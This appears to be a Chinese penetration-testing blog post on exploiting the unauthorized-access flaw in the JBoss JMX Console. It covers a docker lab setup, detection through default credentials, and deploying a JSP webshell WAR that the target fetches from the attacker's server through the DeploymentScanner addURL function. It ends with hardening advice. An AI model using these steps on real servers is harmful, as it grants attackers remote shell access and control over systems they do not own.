Jboss历史漏洞利用 - JMX Console 未授权访问漏洞

环境搭建

docker搭建操作指南

docker search testjboss

docker pull testjboss/jboss

docker run -p 8085:8080 -d testjboss/jboss

docker ps 

#查看是否搭建成功

进行访问,出现以下界面即可搭建成功

漏洞简介

Jboss的webUI界面 http://ip:port/jmx-console 未授权访问(或默认密码 admin/admin ),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取 webshell

漏洞发现

访问

http://xx.xx.xx.xx/jmx-console/

如果可以直接访问或者通过默认账号密码登录则存在对应漏洞

漏洞利用

远程部署war包

找到 jboss.deployment 选项 (jboss自带的部署功能)中的 flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)

也可以直接输入以下URL进入:

http://ip:port/jmx-console/HtmlAdaptor?
action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL

进入页面后找到 void addURL()

在自己的vps上面部署远程的war木马,让目标机器请求我们的木马文件

jar -cvf shell.war jsp木马文件

python3 -m http.server
#python 开启http服务

在浏览器访问地址,获得war包路径。

然后点击 Invoke 部署

点击 Back to Agent View ,找到 jboss.web.deployment,查看是否上传成功

GET SHELL

访问地址:http://ip:port/cmd/cmd.jsp , 输入木马的访问密码即可拿到服务器权限

防护建议

对jmx-console和web-console界面访问增加强认证。

关闭jmx-console和web-console,提高安全性。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试小白

如果您觉得满意,一分一毛也是爱

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值